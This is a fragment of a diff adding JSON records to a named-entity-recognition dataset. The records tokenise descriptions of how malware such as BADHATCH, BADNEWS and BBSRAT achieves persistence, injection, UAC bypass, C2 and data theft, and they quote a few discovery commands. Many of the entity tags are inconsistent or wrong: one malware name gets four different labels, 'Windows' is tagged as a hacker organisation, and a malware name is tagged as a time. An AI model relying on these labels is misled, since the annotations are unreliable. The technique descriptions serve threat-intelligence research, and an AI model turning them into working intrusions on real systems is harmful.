+ "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "achieves", + "persistence", + "by", + "creating", + "a", + "shortcut", + "to", + "itself", + "in", + "the", + "CSIDL_STARTUP", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "its", + "initial", + "execution,", + "BACKSPACE", + "extracts", + "operating", + "system", + "information", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "uses", + "HTTP", + "as", + "a", + "transport", + "to", + "communicate", + "with", + "its", + "command", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "can", + "direct", + "BACKSPACE", + "to", + "execute", + "from", + "the", + "command", + "line", + "on", + "infected", + "hosts,", + "or", + "have", + "BACKSPACE", + "create", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADCALL", + "disables", + "the", + "Windows", + "firewall", + "before", + "binding", + "to", + "a", + "port." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADCALL", + "modifies", + "the", + "firewall", + "Registry", + "key", + "<code>SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BADCALL", + "communicates", + "on", + "ports", + "443", + "and", + "8000", + "with", + "a", + "FakeTLS", + "method." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BADCALL", + "uses", + "a", + "FakeTLS", + "method", + "during", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADCALL", + "functions", + "as", + "a", + "proxy", + "server", + "between", + "the", + "victim", + "and", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADCALL", + "encrypts", + "C2", + "traffic", + "using", + "an", + "XOR/ADD", + "cipher." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "BADCALL", + "collects", + "the", + "computer", + "name", + "and", + "host", + "name", + "on", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADCALL", + "collects", + "the", + "network", + "adapter", + "information." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "compressed", + "data", + "using", + "the", + "aPLib", + "compression", + "library." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "uploaded", + "files", + "from", + "victims'", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "can", + "decode", + "shellcode", + "using", + "a", + "custom", + "rotating", + "XOR", + "cipher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "searched", + "for", + "files", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "download", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "been", + "distributed", + "via", + "spearphishing", + "campaigns", + "containing", + "malicious", + "Microsoft", + "Word", + "documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "captured", + "victim", + "computer", + "name,", + "memory", + "space,", + "and", + "CPU", + "details." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "captured", + "victim", + "IP", + "address", + "details." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADFLICK", + "has", + "delayed", + "communication", + "to", + "the", + "actor-controlled", + "IP", + "address", + "by", + "5", + "minutes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "beacon", + "to", + "a", + "hardcoded", + "C2", + "IP", + "address", + "using", + "TLS", + "encryption", + "every", + "5", + "minutes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "inject", + "itself", + "into", + "a", + "new", + "`svchost.exe", + "-k", + "netsvcs`", + "process", + "using", + "the", + "asynchronous", + "procedure", + "call", + "(APC)", + "queue." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "utilize", + "the", + "CMSTPLUA", + "COM", + "interface", + "and", + "the", + "SilentCleanup", + "task", + "to", + "bypass", + "UAC." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "malicious", + "PowerShell", + "commands", + "can", + "be", + "encoded", + "with", + "base64." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "`net.exe", + "group", + "\"domain", + "admins\"", + "/domain`", + "to", + "identify", + "Domain", + "Administrators." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "`nltest.exe", + "/domain_trusts`", + "to", + "discover", + "domain", + "trust", + "relationships", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "has", + "the", + "ability", + "to", + "execute", + "a", + "malicious", + "DLL", + "by", + "injecting", + "into", + "`explorer.exe`", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "has", + "an", + "embedded", + "second", + "stage", + "DLL", + "payload", + "within", + "the", + "first", + "stage", + "of", + "the", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "be", + "compressed", + "with", + "the", + "ApLib", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "exfiltrate", + "data", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "has", + "the", + "ability", + "to", + "delete", + "PowerShell", + "scripts", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "emulate", + "an", + "FTP", + "server", + "to", + "connect", + "to", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "has", + "the", + "ability", + "to", + "load", + "a", + "second", + "stage", + "malicious", + "DLL", + "file", + "onto", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "utilize", + "Native", + "API", + "functions", + "such", + "as,", + "`ToolHelp32`", + "and", + "`Rt1AdjustPrivilege`", + "to", + "enable", + "`SeDebugPrivilege`", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "check", + "for", + "open", + "ports", + "on", + "a", + "computer", + "by", + "establishing", + "a", + "TCP", + "connection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "check", + "a", + "user's", + "access", + "to", + "the", + "C$", + "share", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "perform", + "pass", + "the", + "hash", + "on", + "compromised", + "machines", + "with", + "x64", + "versions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "utilize", + "`powershell.exe`", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "retrieve", + "a", + "list", + "of", + "running", + "processes", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "inject", + "itself", + "into", + "an", + "existing", + "explorer.exe", + "process", + "by", + "using", + "`RtlCreateUserThread`." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "SOCKS4", + "and", + "SOCKS5", + "proxies", + "to", + "connect", + "to", + "actor-controlled", + "C2", + "servers.", + "BADHATCH", + "can", + "also", + "emulate", + "a", + "reverse", + "proxy", + "on", + "a", + "compromised", + "machine", + "to", + "connect", + "with", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "copy", + "a", + "large", + "byte", + "array", + "of", + "64-bit", + "shellcode", + "into", + "process", + "memory", + "and", + "execute", + "it", + "with", + "a", + "call", + "to", + "`CreateThread`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "a", + "PowerShell", + "object", + "such", + "as,", + "`System.Net.NetworkInformation.Ping`", + "to", + "ping", + "a", + "computer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "`schtasks.exe`", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "take", + "screenshots", + "and", + "send", + "them", + "to", + "an", + "actor-controlled", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "obtain", + "current", + "system", + "information", + "from", + "a", + "compromised", + "machine", + "such", + "as", + "the", + "`SHELL", + "PID`,", + "`PSVERSION`,", + "`HOSTNAME`,", + "`LOGONSERVER`,", + "`LASTBOOTUP`,", + "drive", + "information,", + "OS", + "type/version,", + "bitness,", + "and", + "hostname." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "execute", + "`netstat.exe", + "-f`", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "obtain", + "logged", + "user", + "information", + "from", + "a", + "compromised", + "machine", + "and", + "can", + "execute", + "the", + "command", + "`whoami.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "obtain", + "the", + "`DATETIME`", + "and", + "`UPTIME`", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "impersonate", + "a", + "`lsass.exe`", + "or", + "`vmtoolsd.exe`", + "token." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "over", + "port", + "443", + "to", + "communicate", + "with", + "actor-controlled", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "be", + "utilized", + "to", + "abuse", + "`sslip.io`,", + "a", + "free", + "IP", + "to", + "domain", + "mapping", + "service,", + "as", + "part", + "of", + "actor-controlled", + "C2", + "channels." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "utilize", + "WMI", + "to", + "collect", + "system", + "information,", + "create", + "new", + "processes,", + "and", + "run", + "malicious", + "PowerShell", + "scripts", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADHATCH", + "can", + "use", + "WMI", + "event", + "subscriptions", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "monitors", + "USB", + "devices", + "and", + "copies", + "files", + "with", + "certain", + "extensions", + "to", + "a", + "predefined", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "can", + "use", + "multiple", + "C2", + "channels,", + "including", + "RSS", + "feeds,", + "Github,", + "forums,", + "and", + "blogs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "BADNEWS", + "typically", + "loads", + "its", + "DLL", + "file", + "into", + "a", + "legitimate", + "signed", + "Java", + "or", + "VMware", + "executable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "encrypting", + "C2", + "data,", + "BADNEWS", + "converts", + "it", + "into", + "a", + "hexadecimal", + "representation", + "and", + "then", + "encodes", + "it", + "into", + "base64." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "it", + "first", + "starts,", + "BADNEWS", + "crawls", + "the", + "victim's", + "local", + "drives", + "and", + "collects", + "documents", + "with", + "the", + "following", + "extensions:", + ".doc,", + ".docx,", + ".pdf,", + ".ppt,", + ".pptx,", + "and", + ".txt." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "When", + "it", + "first", + "starts,", + "BADNEWS", + "crawls", + "the", + "victim's", + "mapped", + "drives", + "and", + "collects", + "documents", + "with", + "the", + "following", + "extensions:", + ".doc,", + ".docx,", + ".pdf,", + ".ppt,", + ".pptx,", + "and", + ".txt." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BADNEWS", + "copies", + "files", + "with", + "certain", + "extensions", + "from", + "USB", + "devices", + "to", + "a", + "predefined", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "collects", + "C2", + "information", + "via", + "a", + "dead", + "drop", + "resolver." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "identifies", + "files", + "with", + "certain", + "extensions", + "from", + "USB", + "devices,", + "then", + "copies", + "them", + "to", + "a", + "predefined", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "is", + "capable", + "of", + "downloading", + "additional", + "files", + "through", + "C2", + "channels,", + "including", + "a", + "new", + "version", + "of", + "itself." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "is", + "sometimes", + "signed", + "with", + "an", + "invalid", + "Authenticode", + "certificate", + "in", + "an", + "apparent", + "effort", + "to", + "make", + "it", + "look", + "more", + "legitimate." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "it", + "first", + "starts,", + "BADNEWS", + "spawns", + "a", + "new", + "thread", + "to", + "log", + "keystrokes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "copies", + "documents", + "under", + "15MB", + "found", + "on", + "the", + "victim", + "system", + "to", + "is", + "the", + "user's", + "<code>%temp%\\SMB\\</code>", + "folder.", + "It", + "also", + "copies", + "files", + "from", + "USB", + "devices", + "to", + "a", + "predefined", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "attempts", + "to", + "hide", + "its", + "payloads", + "using", + "legitimate", + "filenames." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "has", + "a", + "command", + "to", + "download", + "an", + ".exe", + "and", + "execute", + "it", + "via", + "CreateProcess", + "API.", + "It", + "can", + "also", + "run", + "with", + "ShellExecute." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "checks", + "for", + "new", + "hard", + "drives", + "on", + "the", + "victim,", + "such", + "as", + "USB", + "devices,", + "by", + "listening", + "for", + "the", + "WM_DEVICECHANGE", + "window", + "message." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "has", + "a", + "command", + "to", + "download", + "an", + ".exe", + "and", + "use", + "process", + "hollowing", + "to", + "inject", + "it", + "into", + "a", + "new", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "installs", + "a", + "registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "creates", + "a", + "scheduled", + "task", + "to", + "establish", + "by", + "executing", + "a", + "malicious", + "payload", + "every", + "subsequent", + "minute." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "has", + "a", + "command", + "to", + "take", + "a", + "screenshot", + "and", + "send", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "encodes", + "C2", + "traffic", + "with", + "base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "encrypts", + "C2", + "data", + "with", + "a", + "ROR", + "by", + "3", + "and", + "an", + "XOR", + "by", + "0x23." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BADNEWS", + "establishes", + "a", + "backdoor", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BADNEWS", + "is", + "capable", + "of", + "executing", + "commands", + "via", + "cmd.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BBK", + "has", + "the", + "ability", + "to", + "decrypt", + "AES", + "encrypted", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "BBK", + "has", + "the", + "ability", + "to", + "download", + "files", + "from", + "C2", + "to", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBK", + "has", + "the", + "ability", + "to", + "use", + "the", + "<code>CreatePipe</code>", + "API", + "to", + "add", + "a", + "sub-process", + "for", + "execution", + "via", + "cmd." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BBK", + "has", + "the", + "ability", + "to", + "inject", + "shellcode", + "into", + "svchost.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BBK", + "can", + "extract", + "a", + "malicious", + "Portable", + "Executable", + "(PE)", + "from", + "a", + "photo." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBK", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBK", + "has", + "the", + "ability", + "to", + "use", + "cmd", + "to", + "run", + "a", + "Portable", + "Executable", + "(PE)", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "can", + "compress", + "data", + "with", + "ZLIB", + "prior", + "to", + "sending", + "it", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BBSRAT", + "has", + "been", + "seen", + "persisting", + "via", + "COM", + "hijacking", + "through", + "replacement", + "of", + "the", + "COM", + "object", + "for", + "MruPidlList", + "<code>{42aedc87-2188-41fd-b9a3-0c966feabec1}</code>", + "or", + "Microsoft", + "WBEM", + "New", + "Event", + "Subsystem", + "<code>{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}</code>", + "depending", + "on", + "the", + "system's", + "CPU", + "architecture." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + 